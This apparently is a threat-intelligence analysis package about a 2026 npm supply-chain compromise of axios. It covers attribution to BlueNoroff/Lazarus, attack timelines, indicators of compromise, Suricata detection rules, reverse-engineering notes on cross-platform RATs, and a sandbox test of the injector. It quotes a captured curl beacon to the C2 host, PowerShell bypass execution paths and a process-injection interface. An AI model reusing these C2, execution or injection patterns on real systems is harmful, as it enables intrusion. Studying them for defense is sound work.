You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Axios npm Supply Chain Compromise — Full Analysis Package
Date: 2026-03-31 | Attribution: BlueNoroff / Lazarus Group (HIGH confidence)
Attack: Maintainer account hijacked, cross-platform RAT deployed via axios@1.14.1 and axios@0.30.4
What happened
On March 30-31, 2026, the npm package axios (~83M weekly downloads) was compromised through a maintainer account hijack. Two malicious versions injected plain-crypto-js@4.2.1, an obfuscated dropper that deploys platform-specific RATs (Windows PowerShell, macOS Mach-O C++, Linux Python). The macOS RAT is classified as NukeSped (Lazarus-exclusive). The internal project name macWebT links directly to BlueNoroff's documented RustBucket webT module from 2023.
Complete reverse engineering of all 5 payloads (full source recovered). radare2 disassembly of macOS Mach-O. setup.js deobfuscation. Memory dump analysis. Live dynamic analysis on Daytona Windows sandbox with peinject mechanism validation.
Complete C2 protocol specification reconstructed from source code. JSON schemas, state machine, platform comparison table. Validated live against running RAT.
Research on the Extension.SubRoutine.Run2() .NET injection DLL — zero public references, completely novel. Closest match: BlueCrab/REvil [Mode]::Setup().
Date: 2026-03-31 | Confidence: HIGH
Finding: The axios macOS RAT project name macWebT is a direct descendant of BlueNoroff's documented webT malware module from RustBucket (2023). Same User-Agent, same beacon interval, same Hostwinds infrastructure.
1. The webT → macWebT Naming Lineage
RustBucket Stage 3 (2023) — SentinelOne Research
Module: webT with methods webT::getinfo + WebT::send_request
The axios C2 (142.11.206.73) is in the same /18 netblock (142.11.192.0/18) as 3 other confirmed Lazarus IPs.
SentinelOne's Hidden Risk report: "Virtual server hosting services such as Quickpacket, Routerhosting, Hostwinds, and others are the most commonly used" by BlueNoroff.
4. Developer Persona Rotation
Username
Campaign
Year
carey
RustBucket Stage 2 & 3
2023
eric
RustBucket Stage 2
2023
henrypatel
RustBucket Stage 2
2023
hero
RustBucket Stage 2
2023
tritium
Operation In(ter)ception
2022
dominic, chris, pooh
Later BlueNoroff campaigns
2024
mac / Jain_DEV
Axios macOS RAT
2026
5. Complete BlueNoroff macOS Campaign Timeline
Date
Campaign
Key Development
Dec 2022
RustBucket discovery
Rust+Obj-C malware, webT module, PDF lures
Apr 2023
RustBucket disclosure (Jamf)
Public reporting
Jun 2023
RustBucket Variant 3 (Elastic)
First persistence via LaunchAgent
Oct 2023
KandyKorn (Elastic)
C++ RAT targeting blockchain engineers
Nov 2023
RustBucket+KandyKorn merge
SwiftLoader droppers deliver KandyKorn
Nov 2023
ObjCShellz (Jamf)
Simplified shell on Hostwinds
Jul 2024
Hidden Risk begins
zshenv persistence, same IE8 UA, Hostwinds
Oct 2024
Hidden Risk disclosure (SentinelOne)
DoPost via libcurl = webT evolution
Feb 2026
Lazarus npm campaign (BeaverTail)
11 malicious npm packages
Mar 31, 2026
Axios supply chain
macWebT project, libcurl Report(), same UA, Hostwinds
bigmathutils v1.1.0 (10K+ downloads then weaponized)
ReversingLabs
Mar 30-31, 2026
Axios compromise
Maintainer hijack, NukeSped RAT, plain-crypto-js
This analysis
47 days between last confirmed Lazarus npm operation and the axios attack — continuous operational tempo.
10. Additional Infrastructure Findings
Neighboring Hostwinds Servers
hwsrv-1320775 through 1320783 resolve to different /16 subnets (104.168.x, 192.236.x). Hostwinds does NOT assign sequential server IDs to the same subnet — no co-located infrastructure found.
com.apple.act.mond is Novel
Never seen in any prior campaign. Known BlueNoroff persistence labels:
com.apple.systemupdate (RustBucket 2023)
com.wifianalyticsagent (NukeSped 2019)
iTunes_trush (AppleJeus)
.zshrc modification (Hidden Risk 2024)
No Cross-Registry Attack
plain-crypto-js does NOT exist on PyPI, RubyGems, or crates.io. Attack was npm-only — consistent with targeted maintainer hijack vs broad typosquatting.
Jain_DEV is Build Artifact Only
Not found on npm, GitHub, or any package registry. The attacker used separate throwaway identities (nrwise, hijacked jasonsaayman) for publishing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"confidence": "CONFIRMED (same IP, name references npm account nrwise)"
}
},
"unconfirmed_domains": {
"nrwise.com": "UNCONFIRMED - Namecheap WHOIS privacy hashes are shared across ALL customers, NOT per-registrant. No IP overlap. Link is circumstantial (name only).",
"macchimpit.rest": "RETRACTED - Registrant hash match is meaningless (shared Namecheap privacy placeholder). Same CF NS pair is the only link but insufficient alone.",
"orangrappa.rest": "RETRACTED - Same as macchimpit.rest."
"macWebT project name matches BlueNoroff RustBucket webT module (SentinelOne 2023)",
"Identical User-Agent string to RustBucket: mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)",
"NukeSped AV classification by 4 engines (Lazarus-exclusive family)",
"Hostwinds AS54290 same /18 as confirmed Lazarus IP 142.11.209.109 (Hunt.io)",
"Developer persona rotation consistent with BlueNoroff OPSEC"
]
},
"notes": {
"windshaper": "User reports overlap with WINDSHAPER malware (DPRK). Not yet publicly documented as a malware family name. Cryptocurrency theme via 'plain-crypto-js' package name aligns with DPRK targeting patterns.",
"registrant_verification": "Namecheap privacy hashes are per-registrant (verified by comparing starbucls.xyz RustBucket domain which has DIFFERENT hash b3e8b765589988d9)"
},
"corrections": {
"2026-03-31T14:00:00Z": "RETRACTED domain claims based on Namecheap registrant hash. Hash 37bfbc24cafea5d2 is a SHARED privacy placeholder, not per-account. namecheap.com itself has the same hash. Only callnrwise.com (same IP) remains confirmed.",
"2026-03-31T19:30:00Z": "CORRECTED: @shadanai and @qqbrowser.dev reclassified from 'attacker accounts' to 'likely downstream victims'. They vendored node_modules/ with compromised axios during the 3h attack window, not intentional malware distribution."
},
"advisories": {
"snyk": [
"SNYK-JS-AXIOS-15850650",
"SNYK-JS-PLAINCRYPTOJS-15850652",
"SNYK-JS-QQBROWSEROPENCLAWQBOT-15850776",
"SNYK-JS-SHADANAIOPENCLAW-15850775"
],
"ghsa": "GHSA-fw8c-xr5c-95f9",
"cwe": "CWE-506 (Embedded Malicious Code)",
"mal": "MAL-2026-2306"
},
"impact": {
"weekly_downloads": "83M+",
"dependent_packages": "174,000+",
"exposure_window": "~3 hours",
"execution_rate": "3% of affected environments (Wiz)",
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Full payload download + static analysis in Lima VM
2026-03-31 10:00
radare2 RE of macOS Mach-O, Node.js deobfuscation of setup.js
2026-03-31 10:30
Zenbox memory dump analysis (47MB, 1,435 files, 12 PE extractions)
2026-03-31 11:00
Extension.SubRoutine DLL recovery attempt — NOT recoverable from available dumps
1. Executive Summary
On March 30-31, 2026, the npm package axios (~83M weekly downloads, 174K dependent packages) was compromised through a maintainer account hijack. The attacker published two malicious versions — axios@1.14.1 and axios@0.30.4 — injecting a dependency on plain-crypto-js@4.2.1, a weaponized package containing an obfuscated JavaScript dropper (setup.js) that executes via the npm postinstall lifecycle hook.
The dropper deploys platform-specific Remote Access Trojans targeting Windows, macOS, and Linux. The macOS RAT is classified as NukeSped by 4 independent AV engines — a malware family exclusively attributed to the Lazarus Group (DPRK/APT38).
Key Facts
Attribute
Detail
Compromised package
axios (versions 1.14.1 and 0.30.4)
Malicious dependency
plain-crypto-js@4.2.1
C2 server
sfrclak[.]com:8000 (142.11.206.73)
C2 tech stack
Express.js (confirmed via URLScan X-Powered-By: Express)
Hosting
Hostwinds LLC, Seattle WA (AS54290)
Registrar
Namecheap Inc. (privacy via Withheld for Privacy ehf, Iceland)
Attribution
Suspected Lazarus Group (DPRK) — NukeSped classification + TTP alignment
Exposure window
~2h53m (axios@1.14.1), ~2h15m (axios@0.30.4)
Detection speed
Socket.dev flagged plain-crypto-js within 6 minutes of publish
Attack Timeline (UTC)
Timestamp
Event
2026-03-27 19:01
Legitimate axios@1.14.0 published via GitHub Actions OIDC
2026-03-30 05:57
plain-crypto-js@4.2.0 published by nrwise — clean decoy
2026-03-30 16:03
Domain sfrclak.com registered via Namecheap
2026-03-30 23:59
plain-crypto-js@4.2.1 published — weaponized with setup.js
2026-03-31 00:05:41
Socket automated detection fires (6 minutes)
2026-03-31 00:21
axios@1.14.1 published via compromised jasonsaayman account
2026-03-31 01:00
axios@0.30.4 published (39 min after first malicious release)
2026-03-31 01:04
@shadanai/openclaw@2026.3.28-2 published (vendored malware)
2026-03-31 01:05
macOS RAT first submitted to VirusTotal
2026-03-31 02:21
@qqbrowser/openclaw-qbot@0.0.130 published (ships tampered axios)
2026-03-31 ~03:15
npm unpublishes both malicious axios versions
2026-03-31 03:25
npm security hold on plain-crypto-js
Notable: Clean decoy plain-crypto-js@4.2.0 was published ~18 hours before the C2 domain was registered — pre-staged operational planning.
2. Attack Vector & Delivery
2.1 Account Compromise
The attacker hijacked npm account "jasonsaayman" (lead axios maintainer) and changed the email to ifstap@proton.me (original: jasonsaayman@gmail.com). A separate npm account "nrwise" (nrwise@proton.me) was used to publish plain-crypto-js. Both accounts now suspended.
Compromise method: Not definitively determined. The account used a long-lived classic npm access token alongside OIDC Trusted Publishing. This token allowed publishing without OIDC binding and potentially bypassed 2FA. Pattern consistent with the qix npm compromise of September 2025 (maintainer phished via fake npmjs.help domain).
AppleScript Execution — arbitrary AppleScript via osascript
System Reconnaissance — process listing, hardware profiling, user enumeration via /etc/master.passwd
Data Exfiltration — collected data sent via Report() over HTTPS
C2 Communication (macOS-specific)
NOTE:api.apple-cloudkit.com is LEGITIMATE Apple infrastructure (confirmed: CNAME → api.apple-cloudkit.fe2.apple-dns.net, resolves to Apple's 17.x.x.x range). The RAT likely uses it as a connectivity check / traffic blending technique, not as a C2 endpoint.
Actual C2:sfrclak[.]com:8000 (same as other platforms)
User-Agent:mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) — IE8/WinXP (anomalous for macOS)
JA3 Fingerprints
JA3 Hash
Notes
656b9a2f4de6ed4909e157482860ab3d
Not in any public threat intel DB
1d9437ff1aa1e958ed34a0fb0313f206
Not in any public threat intel DB
773906b0efdefa24a7f2b8eb6985bf37
Identified as Safari 15.5 — deliberate TLS impersonation
NOTE: The hash provided in the original briefing (fcb81618bb15edfedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf) was truncated — missing a d at position 16. The correct sequence is edfdedfb, not edfedfb. Source: SafeDep.
Report generated 2026-03-31. All VT detection counts verified via vt-cli API at time of writing and may change as vendors update signatures.
13. Post-Incident Updates (March 31 evening)
Detection Trajectory (full day)
Sample
Morning
Afternoon
Evening
New Families
macOS RAT
8/76
15/76
19/76
OrDeR (Qihoo360), Siggen.69 (DrWeb), GM.OSX.NukeSped
Windows Stage 2
12/76
17/76
19/76
Linux RAT
0/76
2/76
4/76
setup.js
2/76
4/76
10/76
AXIOSDROP (TrendMicro), OrDeR (Qihoo360)
Notable: OrDeR Family Name
Qihoo360 created a family linking the dropper and macOS RAT:
Trojan[Downloader]/JS.OrDeR (setup.js)
Trojan[Backdoor]/MacOS.OrDeR (macOS RAT)
Named after the XOR obfuscation key OrDeR_7077 — confirming vendor-level recognition that the dropper and RAT are part of the same campaign.
GitHub Account Compromise CONFIRMED
BleepingComputer reported and we confirmed: GitHub issue #10590 was DELETED (HTTP 410 Gone). The attacker had GitHub access, not just npm. They deleted compromise-related issues to delay detection.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert dns $HOME_NET any -> any any (msg:"AXIOS-RAT C2 DNS Lookup - sfrclak.com"; dns.query; content:"sfrclak.com"; nocase; sid:2026001; rev:1; classtype:trojan-activity;)
# Second C2 Domain (same IP)
alert dns $HOME_NET any -> any any (msg:"AXIOS-RAT C2 DNS Lookup - callnrwise.com"; dns.query; content:"callnrwise.com"; nocase; sid:2026012; rev:1; classtype:trojan-activity;)
# C2 HTTP POST to port 8000
alert http $HOME_NET any -> $EXTERNAL_NET 8000 (msg:"AXIOS-RAT C2 Beacon - POST to port 8000 with campaign ID"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/6202033"; sid:2026002; rev:1; classtype:trojan-activity;)
Axios RAT Toolkit — Vulnerability Analysis & Kill Switches
Date: 2026-03-31 | Purpose: Exploitable bugs for defensive operations
Analysis Environment: Isolated Lima VM — all bugs verified against actual malware source code
Summary
The axios RAT toolkit contains 20+ exploitable bugs across all platforms. The most critical weakness is cleartext HTTP C2 — enabling network-level MitM to take over, neutralize, or kill all connected RATs.
1. Linux RAT (ld.py) — 7 Bugs
CRITICAL: peinject command is BROKEN
Line 156:payload = base64.b64decode(b64_string)
b64_string is undefined. Should be ijtbin (the function parameter).
Impact:peinject command causes NameError exception. Binary injection is non-functional on Linux.
Verified: grep confirms exactly 1 reference to b64_string, 0 definitions.
No C2 response validation
process_request() calls json.loads(data) with no try/except.
Exploitation: Inject malformed JSON via network → crashes the RAT.
Cleartext HTTP — no encryption
Uses http.client.HTTPConnection (not HTTPS).
Exploitation: Full MitM capability — intercept data, inject commands.
World-writable dropped payloads
os.chmod(file_path, 0o777) — any user can replace the payload between write and execute.
Self-identification in process list
Own PID marked with * prefix in exfiltrated process list, including full command line with C2 URL.
No persistence
Relies solely on nohup from dropper. Dies on reboot.
No error recovery
Unhandled exceptions in beacon loop kill the RAT permanently.
Axios Supply Chain — Dropped Payloads Full Reverse Engineering
Last Updated: 2026-03-31 11:00 UTC
Analysis Environment: Lima VM (Ubuntu 24.04 ARM64, isolated, no network)
Tools Used: radare2, Node.js (deobfuscation), strings, file, xxd, python3
Samples Source: VirusTotal API download (vt-cli)
**All files renamed to .mlwr extension for safety
Two modes: direct shell (subprocess.run(shell=True)) or Base64 Python script via python3 -c
rundir
do_action_dir()
Directory listing with metadata (name, isDir, size, created, modified, hasItems)
Status codes:"Wow" = success, "Zzz" = error
1.5 Reconnaissance
Process enumeration: Reads /proc/*/cmdline, /proc/*/stat, /proc/*/status for every PID. Extracts PID, PPID, username (via UID→/etc/passwd lookup), start time, and command line. Marks own PID with * prefix.
System info:/sys/class/dmi/id/sys_vendor, /sys/class/dmi/id/product_name
Boot time:/proc/uptime
Install date: ctime of /var/log/installer or /var/log/dpkg.log
Architecture detection:platform.machine() → maps to linux_x64, linux_arm, or linux_unknown
Writes to /tmp/.<6-random-chars> (dot-prefixed = hidden)
chmod 777 — world-executable
Spawned as subprocess (persists after RAT exit)
1.7 Script Execution (runscript)
Two modes:
Direct shell:subprocess.run(cmdline, shell=True) — arbitrary command execution
Python payload: Base64-decodes script, runs via python3 -c <decoded> with params
1.8 Key Observations
No persistence mechanism — relies solely on nohup from the dropper
No encryption — all C2 comms are Base64 over cleartext HTTP
No anti-analysis — no VM detection, no sandbox evasion, no debugger checks
Why 0/76 detection: The code is syntactically clean Python with no suspicious imports. The subprocess.run(shell=True) and file writing are common legitimate patterns. AV heuristics can't distinguish this from a normal admin script.
Bug:do_action_ijt() references b64_string which is undefined — should be ijtbin. This means the peinject command would crash on Linux. Either this is a bug in this variant or b64_string is meant to be a global set elsewhere.
2. Windows Stage 2 — PowerShell RAT (FULL SOURCE RECOVERED)
All filesystem drive roots via Get-PSDrive -PSProvider FileSystem
System info collected: hostname, username, OS version, timezone, install date, boot time, CPU type, model name, full process list via Get-CimInstance Win32_Process.
2.6 Script Execution — Three Paths
No script, just params:powershell -NoProfile -ep Bypass $param 2>&1
Script ≥ 10KB: Write to temp .ps1 file, execute, delete
Script < 10KB: Double-encode (Unicode → Base64), use -EncodedCommand
2.7 Key Observations
Most sophisticated variant — only one with process injection capability
Reversed variable names suggest code reuse from another tool
Extension.SubRoutine.Run2() — specific .NET class/method for the injector DLL. This is a strong IOC for threat hunting.
mainWork function is empty — the work loop is in work(). Leftover stub.
No explicit count variable initialization — $count = $count + 1 references undefined $count, but PowerShell auto-initializes to 0.
3. Windows Stage 1 — system.bat (FULL SOURCE RECOVERED)
Ad-hoc signed with get-task-allow entitlement — allows attaching debugger, which is needed for the peinject capability to write and codesign payloads at runtime.
6. Cross-Platform Command Interface
All three RATs implement the exact same 4-command protocol:
None of the extracted PEs are the Extension.SubRoutine injector DLL.
7.3 Why the DLL is Not in Zenbox Dumps
The Zenbox sandbox executed the PowerShell RAT, but:
The C2 server (sfrclak.com:8000) was offline when Zenbox ran the sample
The peinject command is server-initiated — it's only sent when the C2 operator explicitly commands injection
Without a C2 response, Process-Request was never called, and Do-Action-Ijt never executed
Therefore [System.Reflection.Assembly]::Load() was never invoked, and the DLL was never loaded into memory
Proof: The persistence bat dropped by Zenbox (e49c2732..., 203 bytes) has empty URL strings — confirming the RAT ran but never received C2 instructions.
8. Extension.SubRoutine DLL Recovery Attempt
8.1 What We Tried
Method
Result
VT dropped_files relationship
Only found system.bat and PS policy test files
VT embedded_files relationship
Self-reference only
Shellcode hashes on VT (a224dd73, 5e2ab672, 20df0909)
These anti-analysis behaviors originate from the injected code, not the PowerShell RAT source
8.5 Gap Assessment
The Extension.SubRoutine DLL is the only unrecovered component of the entire attack chain. To obtain it, one would need:
Access to CAPE sandbox raw memory dumps (not available via VT API)
A live C2 server to receive the peinject command (C2 is offline)
A private threat intel feed that captured the DLL during the attack window
9. Harden-Runner Live Capture (StepSecurity)
StepSecurity's Harden-Runner instrumentation captured the live infection chain in a CI/CD environment:
Exact Timeline (UTC)
Timestamp
PID
Event
01:30:50.905Z
2392
node setup.js begins execution
01:30:51.0Z
2401
curl contacts http://sfrclak.com:8000/6202033 with POST body packages.npm.org/product2
01:30:51.0Z
2400
nohup python3 /tmp/ld.py spawned (orphaned to PID 1)
01:31:27.736Z
2392
package.json overwritten with clean stub (evidence swap)
Key observations:
1.1 seconds from npm install to C2 contact
36.7 seconds between infection and evidence destruction
nohup process labeled "infra" because it was orphaned to PID 1
Harden-Runner flagged "Source Code Overwritten" event on package.json swap
Despite the dropper's anti-forensics, the file modification event was captured
packages.npm.org is NOT an npm URL
Per Semgrep's analysis, packages.npm.org (used in the POST body) is not a fake npm registry URL. The domain actually belongs to the National Association of Pastoral Musicians. The attacker used it as POST data that looks innocuous in network logs — it mimics a legitimate package registry URL but is actually just a platform identifier string sent to the C2 server.
10. Novel Findings Summary
This analysis produced several findings not present in any published vendor report:
Conclusion: V2 is the x86_64-only slice of V1 — same source code, same build environment, but without the ARM64 architecture. Submitted to VT 4 hours after V1, likely by a different researcher who extracted just the x86_64 slice from the universal binary.
Current version (0.0.132) status unknown — may have been cleaned or may still be malicious
Recommendation
These accounts should be reported to npm security for investigation and takedown. The qbot-claw-launcher package with obfuscated code and prebuilt native binaries is particularly concerning.
Correction: Attack Chain is BROKEN
While these packages remain on npm, the infection chain is non-functional:
plain-crypto-js@4.2.1 → replaced with npm security stub (0.0.1-security.0)
C2 server sfrclak.com:8000 → completely offline (all ports refuse connections)
Even if setup.js executes, it cannot download RAT payloads
The real risk is that @shadanai and @qqbrowser.dev accounts remain active and could publish new packages with a fresh C2 at any time.
13. Dynamic Analysis — Live RAT Execution on Daytona Windows Sandbox
Environment: Daytona Windows Server 2022 (QEMU/KVM, AMD EPYC 9254)
Method: Fake C2 server (PowerShell HttpListener) + live PowerShell RAT execution
Date: 2026-03-31
13.1 C2 Protocol Validated
Fake C2 captured 7+ beacons from the live RAT:
Beacon
Type
Content
#1
FirstInfo
Directory listings: Documents, Desktop, OneDrive, AppData\Roaming, all drives
#2
BaseInfo
Full fingerprint: hostname=WIN-FC7GCUO5CCS, user=Administrator, OS=Server 2022, CPU=EPYC 9254, 100+ processes
Deployed test Extension.SubRoutine DLL (C# 5, compiled on sandbox with csc.exe /target:library).
Sent peinject command via fake C2 with test DLL + 5 NOP bytes as shellcode.
Result captured in peinject_log.txt:
Run2 called at 3/31/2026 5:58:14 AM
Target: C:\Windows\system32\cmd.exe
Param: test123
Payload size: 5 bytes
Payload hex: 90-90-90-90-90
This proves:
RAT decodes Base64 IjtDll → [Assembly]::Load() → finds Extension.SubRoutine.Run2()
23.254.226.130 (hwsrv-1318856, Hostwinds) — Express+CORS on 8080, previously hosted MS365 phishing domain login.office.com.msportal.auth.*.2517333.com (Feb 2026). Server ID close to axios C2 (1923 apart) but IDs are not sequential across subnets.
142.11.239.46 (same /18) — ehlpayment.com payment domain, Express+CORS+port 8000+MongoDB. Updated March 30 same hour as sfrclak.com registration. Probed: serves Vite.js frontend (legitimate payment app).
Cloudzy 172.86.69.x cluster — shared ETag indicates same botnet panel, not related
All 26 User-Agent matches — header reflectors/honeypots
Conclusion: No confirmed active replacement C2 found. The 3 original leads (Hostwinds 23.254.167.216, Cloudzy 45.61.128.54/hopex.pro, Cloudzy 144.172.89.231/coretrade.app) remain the strongest indicators. The attacker has not deployed a detectable replacement C2 on the same infrastructure pattern.
Extension.SubRoutine .NET Injector DLL — Research Report
Date: 2026-03-31 | Status: Previously undocumented — ZERO public references
Methodology: 30+ web searches across GitHub, VT, MalwareBazaar, ANY.RUN, ASEC, WithSecure, Elastic, SANS ISC
Verdict
Extension.SubRoutine with method Run2 has zero public references in any malware analysis report, threat intelligence feed, GitHub repository, or sandbox platform. This is a custom-built .NET process injection DLL that has not been previously documented.
Search Results Summary
Query
Results
"Extension.SubRoutine" "Run2"
0 hits
"Extension.SubRoutine" process hollowing
0 hits
"$rotjni" "$daolyap" malware
0 hits
"IjtDll" "IjtBin" C2
0 hits
GitHub code search: Extension.SubRoutine
0 repositories
MalwareBazaar / ANY.RUN / Hybrid Analysis
0 samples
Joe Desimone gist
macOS only — does not mention Windows DLL
Reconstructed Interface
// Based on PowerShell RAT source code analysisnamespaceExtension{publicclassSubRoutine{// Process hollowing into target executable// payload: shellcode/PE to inject// targetExe: "C:\Windows\System32\cmd.exe"// param: additional C2 parameterspublicstaticvoidRun2(byte[]payload,stringtargetExe,stringparam);}}
Closest Known Pattern: BlueCrab/REvil .NET Injector
